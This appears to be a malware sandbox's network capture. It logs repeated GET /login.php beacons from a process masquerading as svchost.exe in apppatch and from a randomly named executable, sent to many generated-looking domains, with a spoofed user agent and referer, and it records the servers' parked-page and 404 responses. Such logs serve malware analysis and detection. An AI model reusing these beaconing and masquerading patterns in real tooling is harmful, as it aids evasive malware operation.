Nov 11, 2024 18:13:25.196286917 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Mon, 11 Nov 2024 17:13:19 GMT Content-Length: 1245 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:13:25.196300030 CET	169	IN	Data Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	63293	85.17.31.82	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:25.004745007 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	63298	199.59.243.227	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:25.091655970 CET	305	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Nov 11, 2024 18:13:25.524069071 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 11 Nov 2024 17:13:25 GMT content-type: text/html; charset=utf-8 content-length: 1094 x-request-id: 8d743981-e4fe-4bd5-9efc-50db61db8c65 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ== set-cookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da; expires=Mon, 11 Nov 2024 17:28:25 GMT Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
Nov 11, 2024 18:13:25.524106979 CET	520	IN	Data Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZmY0YTM5M2UtMWE2MS00NTQzLTkyYjItOGRkOGNhNjUzNGRhIiwicGFnZV90aW1lIjoxNzMxMzQ1MjA1LCJwYWdlX3VybCI6Imh0dHA6L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	63302	85.17.31.82	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:25.366452932 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.6	63305	23.253.46.64	80

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:25.623681068 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Nov 11, 2024 18:13:26.149998903 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Mon, 11 Nov 2024 17:13:20 GMT Content-Length: 1245 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:13:26.150424957 CET	169	IN	Data Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	63471	103.224.212.210	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:36.047619104 CET	277	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Cookie: __tad=1731345193.2353053
Nov 11, 2024 18:13:36.603832006 CET	244	IN	HTTP/1.1 302 Found date: Mon, 11 Nov 2024 17:13:36 GMT server: Apache location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0413-361d-880c-38de75da0bbf content-length: 2 content-type: text/html; charset=UTF-8 connection: close Data Raw: 0a 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	63472	103.224.182.252	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:36.130695105 CET	277	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Cookie: __tad=1731345193.3163760
Nov 11, 2024 18:13:36.687558889 CET	242	IN	HTTP/1.1 302 Found date: Mon, 11 Nov 2024 17:13:36 GMT server: Apache location: http://ww16.vofycot.com/login.php?sub1=20241112-0413-3653-b9c7-4bbc444bdc48 content-length: 2 content-type: text/html; charset=UTF-8 connection: close Data Raw: 0a 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	63478	199.59.243.227	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:37.019841909 CET	404	OUT	GET /login.php?subid1=20241112-0413-361d-880c-38de75da0bbf HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1731345193.2353053; parking_session=420ef3a8-c938-4e4a-99bb-1a08a10d1764
Nov 11, 2024 18:13:37.445703983 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 11 Nov 2024 17:13:37 GMT content-type: text/html; charset=utf-8 content-length: 1230 x-request-id: d398084c-3aea-45b2-af0b-8e18c88158c5 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qlbFYZBrRr3oBXYuT4PpqSvswzx0Pa0r8IbBI7WtofzCyLCzV+Ehf06BCvaaXUwK10jc0WFF8/jAnQAfcKLdRA== set-cookie: parking_session=420ef3a8-c938-4e4a-99bb-1a08a10d1764; expires=Mon, 11 Nov 2024 17:28:37 GMT Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 71 6c 62 46 59 5a 42 72 52 72 33 6f 42 58 59 75 54 34 50 70 71 53 76 73 77 7a 78 30 50 61 30 72 38 49 62 42 49 37 57 74 6f 66 7a 43 79 4c 43 7a 56 2b 45 68 66 30 36 42 43 76 61 61 58 55 77 4b 31 30 6a 63 30 57 46 46 38 2f 6a 41 6e 51 41 66 63 4b 4c 64 52 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qlbFYZBrRr3oBXYuT4PpqSvswzx0Pa0r8IbBI7WtofzCyLCzV+Ehf06BCvaaXUwK10jc0WFF8/jAnQAfcKLdRA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
Nov 11, 2024 18:13:37.445887089 CET	656	IN	Data Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDIwZWYzYTgtYzkzOC00ZTRhLTk5YmItMWEwOGExMGQxNzY0IiwicGFnZV90aW1lIjoxNzMxMzQ1MjE3LCJwYWdlX3VybCI6Imh0dHA6L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	63480	3.94.10.34	80	1656	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:37.301165104 CET	352	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345181\|1731345181\|0\|1\|0
Nov 11, 2024 18:13:37.727586031 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:13:37 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345217\|1731345181\|18\|2\|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	63481	199.191.50.83	80	1656	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:13:37.301786900 CET	281	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478890781963739088
Nov 11, 2024 18:13:38.731242895 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 17:13:37 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw== Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 61 38 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED] Data Ascii: a8fc<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}i
Nov 11, 2024 18:13:38.731271982 CET	212	IN	Data Raw: 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 69 64 22 20 69 6e 20 77 69 6e 64 6f Data Ascii: f(!("cmp_id" in window)\|\|window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host
Nov 11, 2024 18:13:38.731282949 CET	1236	IN	Data Raw: 3d 22 61 2e 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 6e 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 63 64 6e 3d 22 63 64 6e 2e 63 6f Data Ascii: ="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=funct
Nov 11, 2024 18:13:38.731292963 CET	80	IN	Data Raw: 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d 22 29 21 3d 2d 31 29 7b 63 2e 70 75 73 68 28 65 2e 73 75 62 73 74 72 28 65 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d 22 29 2b 38 2c 32 29 2e 74 6f 55 70 70 65 72 43 61 73 65 Data Ascii: .indexOf("cmplang=")!=-1){c.push(e.substr(e.indexOf("cmplang=")+8,2).toUpperCase
Nov 11, 2024 18:13:38.731340885 CET	1236	IN	Data Raw: 28 29 29 7d 65 6c 73 65 7b 69 66 28 22 63 6d 70 5f 73 65 74 6c 61 6e 67 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 6c 61 6e 67 21 3d 22 22 29 7b 63 2e 70 75 73 68 28 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 Data Ascii: ())}else{if("cmp_setlang" in window&&window.cmp_setlang!=""){c.push(window.cmp_setlang.toUpperCase())}else{if(a.length>0){for(var d=0;d<a.length;d++){c.push(a[d])}}}}}if("language" in navigator){c.push(navigator.language)}if("userLanguage" in
Nov 11, 2024 18:13:38.731399059 CET	1236	IN	Data Raw: 6d 70 5f 70 72 6f 74 6f 3a 22 68 74 74 70 73 3a 22 3b 69 66 28 6b 21 3d 22 68 74 74 70 3a 22 26 26 6b 21 3d 22 68 74 74 70 73 3a 22 29 7b 6b 3d 22 68 74 74 70 73 3a 22 7d 76 61 72 20 67 3d 28 22 63 6d 70 5f 72 65 66 22 20 69 6e 20 68 29 3f 68 2e Data Ascii: mp_proto:"https:";if(k!="http:"&&k!="https:"){k="https:"}var g=("cmp_ref" in h)?h.cmp_ref:location.href;var j=u.createElement("script");j.setAttribute("data-cmp-ab","1");var c=x("cmpdesign","cmp_design" in h?h.cmp_design:"");var f=x("cmpregula
Nov 11, 2024 18:13:38.731420994 CET	1236	IN	Data Raw: 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 7d 7d 76 61 72 20 6d 3d 22 6a 73 22 3b 76 61 72 20 70 3d 78 28 22 63 6d 70 64 65 62 75 67 75 6e 6d 69 6e 69 6d 69 7a 65 64 22 2c 22 63 6d 70 64 65 62 75 67 75 6e 6d 69 6e 69 6d 69 7a 65 64 22 20 69 6e 20 Data Ascii: ppendChild(j)}}}var m="js";var p=x("cmpdebugunminimized","cmpdebugunminimized" in h?h.cmpdebugunminimized:0)>0?"":".min";var a=x("cmpdebugcoverage","cmp_debugcoverage" in h?h.cmp_debugcoverage:"");if(a=="1"){m="instrumented";p=""}var j=u.creat
